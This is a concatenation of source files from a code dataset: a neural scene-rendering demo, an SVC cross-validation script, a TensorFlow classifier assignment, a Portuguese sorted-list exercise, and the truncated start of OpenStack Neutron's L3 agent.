action=\"store_true\")\nparser.add_argument(\"-a\", \"--auto_demo\", help=\"Auto demo\", action=\"store_true\")\nexp_path = parser.parse_args().path\nsave_path = exp_path + \"save/\"\nargs = parse_config.load_eval_config(exp_path)\nprint(exp_path)\n\n# Print \nprint(\"Number of world cells: %d\"%(args.w))\nprint(\"Size of view cells: \" + str(args.v))\nprint(\"Number of concepts: %d\"%(args.c))\nprint(\"Number of channels: %d\"%(args.ch))\nprint(\"Downsampling size of view cell: %d\"%(args.down_size))\nprint(\"Number of draw layers: %d\"%(args.draw_layers))\nif args.share_core:\n print(\"Share core: True\")\nelse:\n print(\"Share core: False\")\n\n############ Dataset ############\npath = args.data_path\ntest_dataset = GqnDatasets(root_dir=path, train=False, fraction=args.frac_test)\nprint(\"Data path: %s\"%(args.data_path))\nprint(\"Data fraction: %f / %f\"%(args.frac_train, args.frac_test))\nprint(\"Test data: \", len(test_dataset))\n\n############ Networks ############\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nnet = SRGQN(n_wrd_cells=args.w, view_size=args.v, csize=args.c, ch=args.ch, vsize=7, \\\n draw_layers=args.draw_layers, down_size=args.down_size, share_core=args.share_core).to(device)\nnet.load_state_dict(torch.load(save_path+\"srgqn.pth\"))\nnet.eval()\n\n############ Parameters ############\ndata_loader = DataLoader(test_dataset, batch_size=1, shuffle=False)\nimg_size = (256,256)\nfov = 50\nmap_size = 240\nfill_size = 8\nobs_size = 8\ndemo_loop = 2\nhuman_control = parser.parse_args().keyboard #True#False\nview_inverse = parser.parse_args().view_inverse #True#False\nobs_increase = parser.parse_args().auto_demo\nrender = True\nsignal_pos = None\nfeat_size = 16\n\n############ Events ############\ndef onMouse(event, x, y, flags, param):\n global obs_act, img_size, render, signal_pos, feat_size\n obs_size = (int(img_size[0]/2), int(img_size[1]/2))\n if event == cv2.EVENT_LBUTTONDOWN:\n idxy = (int(x/obs_size[1]), int(y/obs_size[0]))\n id = 4*idxy[0] + idxy[1]\n #print(id)\n if id < 8:\n render = True\n if obs_act[id] == 0:\n obs_act[id] = 1\n else:\n obs_act[id] = 0\n #print(obs_act)\n if event == cv2.EVENT_RBUTTONDOWN:\n idxy = (int(x/img_size[1]*2), int(y/img_size[0]*2))\n id = 4*idxy[0] + idxy[1]\n x_local = x % obs_size[1]\n y_local = y % obs_size[0]\n if obs_size[1]*0.05 < x_local < obs_size[1]*0.95 and \\\n obs_size[0]*0.05 < y_local < obs_size[0]*0.95 and id < 8:\n x_local_norm = x_local / obs_size[1]\n y_local_norm = y_local / obs_size[0]\n print(x_local_norm, y_local_norm, id)\n signal_pos = {\"global\":(x,y), \"local\":(x_local_norm, y_local_norm), \"id\":id}\n render = True\n if event == cv2.EVENT_MOUSEWHEEL:\n if flags > 0:\n #print(\"up\")\n if feat_size < 64:\n feat_size *= 2\n render = True\n else:\n #print(\"down\")\n if feat_size > 8:\n feat_size = int(feat_size/2)\n render = True\n \ncv2.namedWindow('View')\ncv2.setMouseCallback('View', onMouse)\n\n############ Main ############\ndef demo(x_obs, v_obs):\n global human_control, render, obs_act, demo_loop, signal_pos, feat_size, ent_queue\n render = True\n x_obs_torch = x_obs.to(device)\n v_obs_torch = v_obs.to(device)\n net.construct_scene_representation(x_obs_torch, v_obs_torch)\n obs_act = np.array([0]*obs_size)\n obs_act[0:1] = 1\n\n # Map\n img_map = 0.0*np.ones((map_size+2*fill_size, map_size+2*fill_size,3))\n center_pos = (int(map_size/2+fill_size), int(map_size/2+fill_size))\n cv2.circle(img_map, center_pos, int(map_size/2), (0,1,0), 1)\n \n # Initialize Pose\n query_ang = np.rad2deg(np.arctan2(v_obs[0,1], v_obs[0,0]))\n if human_control:\n ang = np.arctan2(v_obs[0,4], v_obs[0,3])\n pos = [float(v_obs[0,0].numpy()), float(v_obs[0,1].numpy())]\n else:\n pos = [np.cos(np.deg2rad(query_ang)), np.sin(np.deg2rad(query_ang))]\n if view_inverse:\n ang = np.deg2rad(query_ang)\n else:\n ang = np.deg2rad(180+query_ang)\n \n step = 0\n while(True):\n # Query Pose\n v_query = np.array([pos[0], pos[1], 0, np.cos(ang), np.sin(ang), 1, 0])\n print(\"\\rStep:\", str(step).zfill(3), \"/\", 180*demo_loop+1 ,\", Camera Pose:\", pos, np.rad2deg(ang), end=\"\")\n\n # Render\n if render:\n render = False\n # Network Forward\n v_query_torch = torch.FloatTensor(v_query).unsqueeze(0)\n x_query = net.scene_render(v_query_torch.to(device), obs_act)\n x_query = x_query[0].detach().cpu()\n x_query_view = cv2.cvtColor(x_query.permute(1,2,0).numpy(), cv2.COLOR_BGR2RGB)\n x_query_view = cv2.resize(x_query_view, img_size, interpolation=cv2.INTER_NEAREST)\n \n # Draw Signal\n if signal_pos is not None:\n std = 0.04\n hp = gaussian_heatmap(signal_pos[\"local\"], std, (feat_size,feat_size,args.c))\n view_cell_sim = hp / np.max(hp) * 50\n view_cell_torch = torch.FloatTensor(view_cell_sim).reshape(1,feat_size,feat_size,args.c).permute(0,3,1,2).to(device)\n routing = net.visualize_routing(view_cell_torch, v_obs_torch[signal_pos[\"id\"]].unsqueeze(0), v_query_torch.to(device), view_size=(feat_size, feat_size))\n routing = routing.permute(0,2,3,1).detach().cpu().reshape(feat_size,feat_size,args.c).numpy()[:,:,0:3]\n signal_query = cv2.resize(routing, img_size, interpolation=cv2.INTER_NEAREST)\n x_query_view = x_query_view * (signal_query*0.75+0.25)\n\n # Draw Query Image\n ren_text = \"Render\"\n if signal_pos is None:\n ren_text = \"Render\"\n else:\n ren_text = \"Query Signal \" + str(feat_size) + \"x\" + str(feat_size)\n cv2.putText(x_query_view, ren_text, (10,24), cv2.FONT_HERSHEY_TRIPLEX , 0.6, (0,0,1), 1, cv2.LINE_AA)\n cv2.rectangle(x_query_view, (0,0), img_size, (0,0,1), 12)\n\n # Draw Observation Images\n x_obs_canvas = 0.2*np.ones([img_size[0]*2, img_size[1], 3], dtype=np.float32)\n for i in range(x_obs.shape[0]):\n osize = (int(img_size[0]/2), int(img_size[1]/2))\n c = int(255*(0.8/x_obs.shape[0]*i+0.1)) * np.array([1,1], dtype=np.uint8)\n color = cv2.applyColorMap(c, cv2.COLORMAP_VIRIDIS)[0,0] / 255.0\n \n x_obs_view = cv2.cvtColor(x_obs[i].permute(1,2,0).numpy(), cv2.COLOR_BGR2RGB)\n x_obs_view = cv2.resize(x_obs_view, osize, interpolation=cv2.INTER_NEAREST)\n if obs_act[i] == 0:\n x_obs_view *= 0.2\n cv2.rectangle(x_obs_view, (0,0), osize, color, 8)\n text = \"Obs\" + str(i+1)\n cv2.putText(x_obs_view, text, (5,20), cv2.FONT_HERSHEY_TRIPLEX , 0.6, color, 1, cv2.LINE_AA)\n x_obs_canvas[(i%4)*osize[0]:(i%4+1)*osize[0], int(i/4)*osize[1]:int(i/4+1)*osize[1]] = x_obs_view\n\n # Draw Observation Cameras\n img_map_cam = img_map.copy()\n for i in range(obs_act.shape[0]):\n c = int(255*(0.8/obs_act.shape[0]*i+0.1)) * np.array([1,1], dtype=np.uint8)\n color = cv2.applyColorMap(c, cv2.COLORMAP_VIRIDIS)[0,0] / 255.0\n if obs_act[i] == 1: \n img_map_cam = draw_camera(img_map_cam, v_obs[i].numpy(), color=color, line_size=30, center_line=False)\n \n # Draw Query Camera\n img_map_cam = draw_camera(img_map_cam.copy(), v_query, color=(0,0,1))\n cv2.rectangle(img_map_cam, (0,0), img_size, (0.4,0.4,0.4), 12)\n cv2.putText(img_map_cam, \"Cam\", (10,25), cv2.FONT_HERSHEY_TRIPLEX , 0.6, (0.4,0.4,0.4), 1, cv2.LINE_AA)\n view_canvas = cv2.vconcat([x_query_view.astype(np.float32), img_map_cam.astype(np.float32)])\n view_canvas = cv2.hconcat([x_obs_canvas, view_canvas])\n if signal_pos is not None:\n cv2.circle(view_canvas, signal_pos['global'], 5, (0,1,1), 3)\n cv2.imshow(\"View\", view_canvas)\n \n ########################################################\n # View Control\n if human_control:\n k = cv2.waitKey(10)\n # Ring Control\n if k == ord('z'):\n render = True\n query_ang -= 2\n query_ang = query_ang % 360\n pos = [np.cos(np.deg2rad(query_ang)), np.sin(np.deg2rad(query_ang))]\n if view_inverse:\n ang = np.deg2rad(query_ang)\n else:\n ang = np.deg2rad(180+query_ang)\n if k == ord('c'):\n render = True\n query_ang += 2\n query_ang = query_ang % 360\n pos = [np.cos(np.deg2rad(query_ang)), np.sin(np.deg2rad(query_ang))]\n if view_inverse:\n ang = np.deg2rad(query_ang)\n else:\n ang = np.deg2rad(180+query_ang)\n # Move Control\n if k == ord('w'):\n render = True\n pos[0] -= np.cos(ang) * 0.05\n pos[1] -= np.sin(ang) * 0.05\n if k == ord('s'):\n render = True\n pos[0] += np.cos(ang) * 0.05\n pos[1] += np.sin(ang) * 0.05\n if k == ord('q'):\n render = True\n ang += np.deg2rad(4)\n if k == ord('e'):\n render = True\n ang -= np.deg2rad(4)\n if k == ord('a'):\n render = True\n pos[0] += np.sin(ang) * 0.05\n pos[1] -= np.cos(ang) * 0.05\n if k == ord('d'):\n render = True\n pos[0] -= np.sin(ang) * 0.05\n pos[1] += np.cos(ang) * 0.05\n # Switch to Observation Camera\n if ord('1') <= k <= ord('8'):\n render = True\n cid = int(k - 49) \n ang = np.arctan2(v_obs[cid,4], v_obs[cid,3])\n pos = [float(v_obs[cid,0].numpy()), float(v_obs[cid,1].numpy())]\n # Re-render\n if k == 13:\n render = True\n # Swith Human Control / Ring Demo\n if k == ord('r'):\n human_control = False\n else:\n render = True\n step += 1\n query_ang += 2\n pos = [np.cos(np.deg2rad(query_ang)), np.sin(np.deg2rad(query_ang))]\n if view_inverse:\n ang = np.deg2rad(query_ang)\n else:\n ang = np.deg2rad(180+query_ang)\n if step > 180*demo_loop+1:\n break\n if obs_increase:\n progress = int(step / (180*demo_loop) * 8)\n #print(progress)\n for i in range(len(obs_act)):\n if i <= progress:\n obs_act[i] = 1\n k = cv2.waitKey(1)\n # Swith Human Control / Ring Demo\n if k == ord('r'):\n human_control = True\n # Next / Break\n if k == 32:\n break\n if k == 27:\n exit()\n if k == ord('f'):\n signal_pos = None\n render = True\n print()\n\nobs_act = np.array([0]*obs_size)\nobs_act[0:3] = 1\n#print(\"[ Press any button to start ]\")\n#cv2.waitKey(0)\nfor it, batch in enumerate(data_loader):\n image = batch[0].squeeze(0)\n pose = batch[1].squeeze(0) \n for bit in range(image.shape[0]):\n print(\"[ Data\", it+1, \"| Batch\", bit+1, \"]\")\n x_obs = image[bit,:obs_size]\n v_obs = pose[bit,:obs_size].reshape(-1,7)\n demo(x_obs, v_obs)\n break","repo_name":"jerrywiston/Spatial-Transformation-Routing-Generative-Query-Network","sub_path":"backup/explore2.py","file_name":"explore2.py","file_ext":"py","file_size_in_byte":14324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"740696096","text":"from sklearn.model_selection import KFold\nfrom sklearn.svm import SVC\nimport pandas as pd\nimport warnings\nimport os\nwarnings.filterwarnings(\"ignore\")\nfrom joblib import load\ndef models():\n PROCESSED_DATA_DIR = os.environ[\"PROCESSED_DATA_DIR\"]\n train_data_file = 'train.csv'\n train_data_path = os.path.join(PROCESSED_DATA_DIR, train_data_file)\n# Read data\n df = pd.read_csv(train_data_path, sep=\",\")\n X = df.drop('risk', axis=1)\n y = df['risk']\n\n # Set the number of folds for cross-validation\n k = 5\n\n # Create a KFold object\n kf = KFold(n_splits=k, shuffle=True)\n\n # Initialize a list to store the accuracy scores for each fold\n accuracy_scores = []\n\n for train_index, test_index in kf.split(X):\n # Split the data into training and test sets for the current fold\n X_train, X_test = X.iloc[train_index], X.iloc[test_index]\n y_train, y_test = y.iloc[train_index], y.iloc[test_index]\n model = SVC()\n lr=SVC()\n lr.fit(X_train,y_train)\n from joblib import dump\n dump(lr, 'lr.joblib')\n # Train the model on the training data\n \n\n # Evaluate the model on the test data\n accuracy = lr.score(X_test, y_test)\n\n # Store the accuracy score for the current fold\n accuracy_scores.append(accuracy)\n\n #print(plot_confusion_matrix(model,X_test,y_test))\n\n # Compute the average accuracy across all folds\n average_accuracy = sum(accuracy_scores) / len(accuracy_scores)\n\n # Print the average accuracy\n print(\"Average accuracy:\", average_accuracy)\nif __name__ == '__main__':\n models()\n","repo_name":"Ghada2021/API-A","sub_path":"Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3783925284","text":"#\n# Project 1, starter code part a\n#\nimport math\nimport tensorflow as tf\nimport numpy as np\nimport pylab as plt\nimport os\nfrom sklearn.model_selection import train_test_split\n\nif not os.path.isdir('figures'):\n print('creating the figures folder')\n os.makedirs('figures')\n\ntf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)\n\n\n# scale data\ndef scale(X, X_min, X_max):\n return (X - X_min) / (X_max - X_min)\n\n\nNUM_FEATURES = 21\nNUM_CLASSES = 3\n\nlearning_rate = 0.01\nepochs = 1200\nseed = 10\ntf.set_random_seed(seed)\n\n\ndef fnn(layer):\n\n loss = None\n logits = None\n batch_size = None\n\n # read train data\n train_input = np.genfromtxt('ctg_data_cleaned.csv', delimiter=',')\n trainX, train_Y = train_input[1:, :21], train_input[1:, -1].astype(int)\n trainX = scale(trainX, np.min(trainX, axis=0), np.max(trainX, axis=0))\n\n trainY = np.zeros((train_Y.shape[0], NUM_CLASSES))\n trainY[np.arange(train_Y.shape[0]), train_Y - 1] = 1 # one hot matrix\n\n # split the test and training data into 70:30\n trainX, testX, trainY, testY = train_test_split(trainX, trainY, test_size=0.3, shuffle=True)\n\n n = trainX.shape[0]\n\n idx = np.arange(n)\n print(idx)\n\n # Create the model\n x = tf.placeholder(tf.float32, [None, NUM_FEATURES])\n y_ = tf.placeholder(tf.float32, [None, NUM_CLASSES])\n\n if layer == 3:\n\n batch_size = 8\n num_neurons = 20\n beta = 1e-9\n\n # Hidden 1\n h_weights = tf.Variable(\n tf.random.truncated_normal([NUM_FEATURES, num_neurons], stddev=1.0 / math.sqrt(float(NUM_FEATURES))),\n name='weights')\n h_biases = tf.Variable(tf.zeros([num_neurons]), name='biases')\n\n h = tf.nn.relu(tf.matmul(x, h_weights) + h_biases)\n\n # Output layer\n weights = tf.Variable(\n tf.random.truncated_normal([num_neurons, NUM_CLASSES], stddev=1.0 / math.sqrt(float(NUM_FEATURES))),\n name='weights')\n biases = tf.Variable(tf.zeros([NUM_CLASSES]), name='biases')\n logits = tf.matmul(h, weights) + biases\n\n # Build the graph for the deep net\n\n cross_entropy = tf.nn.softmax_cross_entropy_with_logits_v2(labels=y_, logits=logits)\n L2_regularization = tf.nn.l2_loss(h_weights) + tf.nn.l2_loss(weights)\n loss = tf.reduce_mean(cross_entropy + beta * L2_regularization)\n\n elif layer == 4:\n\n batch_size = 32\n num_neurons = 10\n beta = 1e-6\n\n # Hidden 1\n h_weights = tf.Variable(\n tf.random.truncated_normal([NUM_FEATURES, num_neurons], stddev=1.0 / math.sqrt(float(NUM_FEATURES))),\n name='weights')\n h_biases = tf.Variable(tf.zeros([num_neurons]), name='biases')\n\n h = tf.nn.relu(tf.matmul(x, h_weights) + h_biases)\n\n # Hidden 2\n h2_weights = tf.Variable(\n tf.random.truncated_normal([num_neurons, num_neurons], stddev=1.0 / math.sqrt(float(NUM_FEATURES))),\n name='weights')\n h2_biases = tf.Variable(tf.zeros([num_neurons]), name='biases')\n\n h2 = tf.nn.relu(tf.matmul(h, h2_weights) + h2_biases)\n\n # Output layer\n weights = tf.Variable(\n tf.random.truncated_normal([num_neurons, NUM_CLASSES], stddev=1.0 / math.sqrt(float(NUM_FEATURES))),\n name='weights')\n biases = tf.Variable(tf.zeros([NUM_CLASSES]), name='biases')\n logits = tf.matmul(h2, weights) + biases\n\n # Build the graph for the deep net\n\n cross_entropy = tf.nn.softmax_cross_entropy_with_logits_v2(labels=y_, logits=logits)\n L2_regularization = tf.nn.l2_loss(h_weights) + tf.nn.l2_loss(h2_weights) + tf.nn.l2_loss(weights)\n loss = tf.reduce_mean(cross_entropy + beta * L2_regularization)\n\n # Create the gradient descent optimizer with the given learning rate.\n optimizer = tf.train.GradientDescentOptimizer(learning_rate)\n train_op = optimizer.minimize(loss)\n\n correct_prediction = tf.cast(tf.equal(tf.argmax(logits, 1), tf.argmax(y_, 1)), tf.float32)\n accuracy = tf.reduce_mean(correct_prediction)\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n train_acc = []\n test_acc = []\n\n for i in range(epochs):\n np.random.shuffle(idx)\n trainX = trainX[idx]\n trainY = trainY[idx]\n\n for start, end in zip(range(0, n, batch_size), range(batch_size, n, batch_size)):\n train_op.run(feed_dict={x: trainX[start:end], y_: trainY[start:end]})\n\n train_acc.append(accuracy.eval(feed_dict={x: trainX, y_: trainY}))\n test_acc.append(accuracy.eval(feed_dict={x: testX, y_: testY}))\n\n if i % 100 == 0:\n print('iter %d: training accuracy %g' % (i, train_acc[i]))\n print('iter %d: test accuracy %g' % (i, test_acc[i]), '\\n')\n\n return train_acc, test_acc\n\ndef main():\n train = []\n test = []\n layer = [3, 4]\n\n for i in range(len(layer)):\n train_acc, test_acc = fnn(layer[i])\n\n train.append(train_acc)\n test.append(test_acc)\n\n # plot learning curves\n for j in range(2):\n plt.figure(1)\n plt.plot(range(epochs), train[j])\n plt.legend([\"[3, 8, 20, 1e-9]\", \"[4, 32, 10, 10, 1e-6]\"], loc='lower right')\n plt.xlabel(str(epochs) + ' iterations')\n plt.ylabel('Accuracy')\n plt.title('Train Accuracy')\n plt.savefig('./figures/PartA_Qn5b_Acc.png')\n\n plt.figure(2)\n plt.plot(range(epochs), test[j])\n plt.legend([\"[3, 8, 20, 1e-9]\", \"[4, 32, 10, 10, 1e-6]\"], loc='lower right')\n plt.xlabel(str(epochs) + ' iterations')\n plt.ylabel('Accuracy')\n plt.title('Test Accuracy')\n plt.savefig('./figures/PartA_Qn5b_Err.png')\n\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"pngqj/CZ4042-Neural-Network-project","sub_path":"project 1/Part A/Qn5B.py","file_name":"Qn5B.py","file_ext":"py","file_size_in_byte":5861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72972125993","text":"'''\nCrie um programa onde o usuário possa digitar cinco valores numéricos e cadastre-os em uma lista, \njá na posição correta de inserção (sem usar o sort()). \nNo final, mostre a lista ordenada na tela.\n'''\nfrom os import system\nsystem('clear')\n\nlista = []\nfor c in range(0, 5):\n numero = int(input('Registre um valor: '))\n\n if c == 0 or numero > lista[-1]:\n lista.append(numero)\n print('Adicionado ao final da lista')\n else:\n posicao = 0\n while posicao < len(lista):\n if numero <= lista[posicao]:\n lista.insert(posicao, numero)\n print(f'Adicionado na posição {posicao} da lista')\n break\n posicao += 1\n\nprint(f'Os valores registrados são: {lista}')\n","repo_name":"bernaRocha/guanabara_Python","sub_path":"exercicios71-90/ex_080-lista-ordenada.py","file_name":"ex_080-lista-ordenada.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"8669826271","text":"import functools\n\nimport eventlet\nimport netaddr\nfrom neutron_lib.agent import constants as agent_consts\nfrom neutron_lib.agent import topics\nfrom neutron_lib.callbacks import events\nfrom neutron_lib.callbacks import registry\nfrom neutron_lib.callbacks import resources\nfrom neutron_lib import constants as lib_const\nfrom neutron_lib import context as n_context\nfrom neutron_lib.exceptions import l3 as l3_exc\nfrom neutron_lib import rpc as n_rpc\nfrom oslo_concurrency import lockutils\nfrom oslo_config import cfg\nfrom oslo_context import context as common_context\nfrom oslo_log import log as logging\nimport oslo_messaging\nfrom oslo_serialization import jsonutils\nfrom oslo_service import loopingcall\nfrom oslo_service import periodic_task\nfrom oslo_utils import excutils\nfrom oslo_utils import netutils\nfrom oslo_utils import timeutils\nfrom osprofiler import profiler\n\nfrom neutron.agent.common import resource_processing_queue as queue\nfrom neutron.agent.common import utils as common_utils\nfrom neutron.agent.l3 import dvr\nfrom neutron.agent.l3 import dvr_edge_ha_router\nfrom neutron.agent.l3 import dvr_edge_router as dvr_router\nfrom neutron.agent.l3 import dvr_local_router\nfrom neutron.agent.l3 import ha\nfrom neutron.agent.l3 import ha_router\nfrom neutron.agent.l3 import l3_agent_extension_api as l3_ext_api\nfrom neutron.agent.l3 import l3_agent_extensions_manager as l3_ext_manager\nfrom neutron.agent.l3 import legacy_router\nfrom neutron.agent.l3 import namespace_manager\nfrom neutron.agent.l3 import namespaces as l3_namespaces\nfrom neutron.agent.linux import external_process\nfrom neutron.agent.linux import pd\nfrom neutron.agent.metadata import driver as metadata_driver\nfrom neutron.agent import rpc as agent_rpc\nfrom neutron.common import utils\nfrom neutron import manager\n\nLOG = logging.getLogger(__name__)\n\n# Number of routers to fetch from server at a time on resync.\n# Needed to reduce load on server side and to speed up resync on agent side.\nSYNC_ROUTERS_MAX_CHUNK_SIZE = 256\nSYNC_ROUTERS_MIN_CHUNK_SIZE = 32\n\n# Priorities - lower value is higher priority\nPRIORITY_RELATED_ROUTER = 0\nPRIORITY_RPC = 1\nPRIORITY_SYNC_ROUTERS_TASK = 2\nPRIORITY_PD_UPDATE = 3\n\n# Actions\nDELETE_ROUTER = 1\nDELETE_RELATED_ROUTER = 2\nADD_UPDATE_ROUTER = 3\nADD_UPDATE_RELATED_ROUTER = 4\nPD_UPDATE = 5\nUPDATE_NETWORK = 6\n\nRELATED_ACTION_MAP = {DELETE_ROUTER: DELETE_RELATED_ROUTER,\n ADD_UPDATE_ROUTER: ADD_UPDATE_RELATED_ROUTER}\n\nROUTER_PROCESS_GREENLET_MAX = 32\nROUTER_PROCESS_GREENLET_MIN = 8\n\n\ndef log_verbose_exc(message, router_payload):\n LOG.exception(message)\n LOG.debug(\"Payload:\\n%s\",\n utils.DelayedStringRenderer(jsonutils.dumps,\n router_payload, indent=5))\n\n\nclass L3PluginApi(object):\n \"\"\"Agent side of the l3 agent RPC API.\n\n API version history:\n 1.0 - Initial version.\n 1.1 - Floating IP operational status updates\n 1.2 - DVR support: new L3 plugin methods added.\n - get_ports_by_subnet\n - get_agent_gateway_port\n Needed by the agent when operating in DVR/DVR_SNAT mode\n 1.3 - Get the list of activated services\n 1.4 - Added L3 HA update_router_state. This method was reworked in\n to update_ha_routers_states\n 1.5 - Added update_ha_routers_states\n 1.6 - Added process_prefix_update\n 1.7 - DVR support: new L3 plugin methods added.\n - delete_agent_gateway_port\n 1.8 - Added address scope information\n 1.9 - Added get_router_ids\n 1.10 Added update_all_ha_network_port_statuses\n 1.11 Added get_host_ha_router_count\n 1.12 Added get_networks\n 1.13 Removed get_external_network_id\n \"\"\"\n\n def __init__(self, topic, host):\n self.host = host\n target = oslo_messaging.Target(topic=topic, version='1.0')\n self.client = n_rpc.get_client(target)\n\n @utils.timecost\n def get_routers(self, context, router_ids=None):\n \"\"\"Make a remote process call to retrieve the sync data for routers.\"\"\"\n cctxt = self.client.prepare()\n return cctxt.call(context, 'sync_routers', host=self.host,\n router_ids=router_ids)\n\n @utils.timecost\n def update_all_ha_network_port_statuses(self, context):\n \"\"\"Make a remote process call to update HA network port status.\"\"\"\n cctxt = self.client.prepare(version='1.10')\n return cctxt.call(context, 'update_all_ha_network_port_statuses',\n host=self.host)\n\n @utils.timecost\n def get_router_ids(self, context):\n \"\"\"Make a remote process call to retrieve scheduled routers ids.\"\"\"\n cctxt = self.client.prepare(version='1.9')\n return cctxt.call(context, 'get_router_ids', host=self.host)\n\n @utils.timecost\n def update_floatingip_statuses(self, context, router_id, fip_statuses):\n \"\"\"Call the plugin update floating IPs's operational status.\"\"\"\n cctxt = self.client.prepare(version='1.1')\n return cctxt.call(context, 'update_floatingip_statuses',\n router_id=router_id, fip_statuses=fip_statuses)\n\n @utils.timecost\n def get_ports_by_subnet(self, context, subnet_id):\n \"\"\"Retrieve ports by subnet id.\"\"\"\n cctxt = self.client.prepare(version='1.2')\n return cctxt.call(context, 'get_ports_by_subnet', host=self.host,\n subnet_id=subnet_id)\n\n @utils.timecost\n def get_agent_gateway_port(self, context, fip_net):\n \"\"\"Get or create an agent_gateway_port.\"\"\"\n cctxt = self.client.prepare(version='1.2')\n return cctxt.call(context, 'get_agent_gateway_port',\n network_id=fip_net, host=self.host)\n\n @utils.timecost\n def get_service_plugin_list(self, context):\n \"\"\"Make a call to get the list of activated services.\"\"\"\n cctxt = self.client.prepare(version='1.3')\n return cctxt.call(context, 'get_service_plugin_list')\n\n @utils.timecost\n def update_ha_routers_states(self, context, states):\n \"\"\"Update HA routers states.\"\"\"\n cctxt = self.client.prepare(version='1.5')\n return cctxt.cast(context, 'update_ha_routers_states',\n host=self.host, states=states)\n\n @utils.timecost\n def process_prefix_update(self, context, prefix_update):\n \"\"\"Process prefix update whenever prefixes get changed.\"\"\"\n cctxt = self.client.prepare(version='1.6')\n return cctxt.call(context, 'process_prefix_update',\n subnets=prefix_update)\n\n @utils.timecost\n def delete_agent_gateway_port(self, context, fip_net):\n \"\"\"Delete Floatingip_agent_gateway_port.\"\"\"\n cctxt = self.client.prepare(version='1.7')\n return cctxt.call(context, 'delete_agent_gateway_port',\n host=self.host, network_id=fip_net)\n\n @utils.timecost\n def get_host_ha_router_count(self, context):\n \"\"\"Make a call to get the count of HA router.\"\"\"\n cctxt = self.client.prepare(version='1.11')\n return cctxt.call(context, 'get_host_ha_router_count', host=self.host)\n\n def get_networks(self, context, filters=None, fields=None):\n \"\"\"Get networks.\n\n :param context: Security context\n :param filters: The filters to apply.\n E.g {\"id\" : [\"\", ...]}\n :param fields: A list of fields to collect, e.g [\"id\", \"subnets\"].\n :return: A list of dicts where each dict represent a network object.\n \"\"\"\n\n cctxt = self.client.prepare(version='1.12')\n return cctxt.call(\n context, 'get_networks', filters=filters, fields=fields)\n\n\nclass RouterFactory(object):\n\n def __init__(self):\n self._routers = {}\n\n def register(self, features, router_cls):\n \"\"\"Register router class which implements BaseRouterInfo\n\n Features which is a list of strings converted to frozenset internally\n for key uniqueness.\n\n :param features: a list of strings of router's features\n :param router_cls: a router class which implements BaseRouterInfo\n \"\"\"\n self._routers[frozenset(features)] = router_cls\n\n def create(self, features, **kwargs):\n \"\"\"Create router instance with registered router class\n\n :param features: a list of strings of router's features\n :param kwargs: arguments for router class\n :returns: a router instance which implements BaseRouterInfo\n :raises: n_exc.RouterNotFoundInRouterFactory\n \"\"\"\n try:\n router = self._routers[frozenset(features)]\n return router(**kwargs)\n except KeyError:\n exc = l3_exc.RouterNotFoundInRouterFactory(\n router_id=kwargs['router_id'], features=features)\n LOG.exception(exc.msg)\n raise exc\n\n\n@profiler.trace_cls(\"l3-agent\")\nclass L3NATAgent(ha.AgentMixin,\n dvr.AgentMixin,\n manager.Manager):\n \"\"\"Manager for L3NatAgent\n\n API version history:\n 1.0 initial Version\n 1.1 changed the type of the routers parameter\n to the routers_updated method.\n It was previously a list of routers in dict format.\n It is now a list of router IDs only.\n Per rpc versioning rules, it is backwards compatible.\n 1.2 - DVR support: new L3 agent methods added.\n - add_arp_entry\n - del_arp_entry\n 1.3 - fipnamespace_delete_on_ext_net - to delete fipnamespace\n after the external network is removed\n Needed by the L3 service when dealing with DVR\n 1.4 - support network_update to get MTU updates\n \"\"\"\n target = oslo_messaging.Target(version='1.4')\n\n def __init__(self, host, conf=None):\n if conf:\n self.conf = conf\n else:\n self.conf = cfg.CONF\n self.check_config()\n self.router_info = {}\n self.router_factory = RouterFactory()\n self._register_router_cls(self.router_factory)\n\n self._check_config_params()\n\n self.process_monitor = external_process.ProcessMonitor(\n config=self.conf,\n resource_type='router')\n\n self._context = n_context.get_admin_context_without_session()\n self.plugin_rpc = L3PluginApi(topics.L3PLUGIN, host)\n\n self.driver = common_utils.load_interface_driver(\n self.conf,\n get_networks_callback=functools.partial(\n self.plugin_rpc.get_networks, self.context))\n\n self.fullsync = True\n self.sync_routers_chunk_size = SYNC_ROUTERS_MAX_CHUNK_SIZE\n self._exiting = False\n\n # Get the HA router count from Neutron Server\n # This is the first place where we contact neutron-server on startup\n # so retry in case its not ready to respond.\n while True:\n try:\n self.ha_router_count = int(\n self.plugin_rpc.get_host_ha_router_count(self.context))\n except oslo_messaging.MessagingTimeout as e:\n LOG.warning('l3-agent cannot contact neutron server '\n 'to retrieve HA router count. '\n 'Check connectivity to neutron server. '\n 'Retrying... '\n 'Detailed message: %(msg)s.', {'msg': e})\n continue\n break\n LOG.info(\"Agent HA routers count %s\", self.ha_router_count)\n\n self.init_extension_manager(self.plugin_rpc)\n\n self.metadata_driver = None\n if self.conf.enable_metadata_proxy:\n self.metadata_driver = metadata_driver.MetadataDriver(self)\n\n self.namespaces_manager = namespace_manager.NamespaceManager(\n self.conf,\n self.driver,\n self.metadata_driver)\n\n # L3 agent router processing green pool\n self._pool_size = ROUTER_PROCESS_GREENLET_MIN\n self._pool = eventlet.GreenPool(size=self._pool_size)\n self._queue = queue.ResourceProcessingQueue()\n super(L3NATAgent, self).__init__(host=self.conf.host)\n\n self.target_ex_net_id = None\n self.use_ipv6 = netutils.is_ipv6_enabled()\n\n self.pd = pd.PrefixDelegation(self.context, self.process_monitor,\n self.driver,\n self.plugin_rpc.process_prefix_update,\n self.create_pd_router_update,\n self.conf)\n\n # Consume network updates to trigger router resync\n consumers = [[topics.NETWORK, topics.UPDATE]]\n agent_rpc.create_consumers([self], topics.AGENT, consumers)\n\n self._check_ha_router_process_status()\n\n def check_config(self):\n if self.conf.cleanup_on_shutdown:\n LOG.warning(\"cleanup_on_shutdown is set to True, so L3 agent will \"\n \"cleanup all its routers 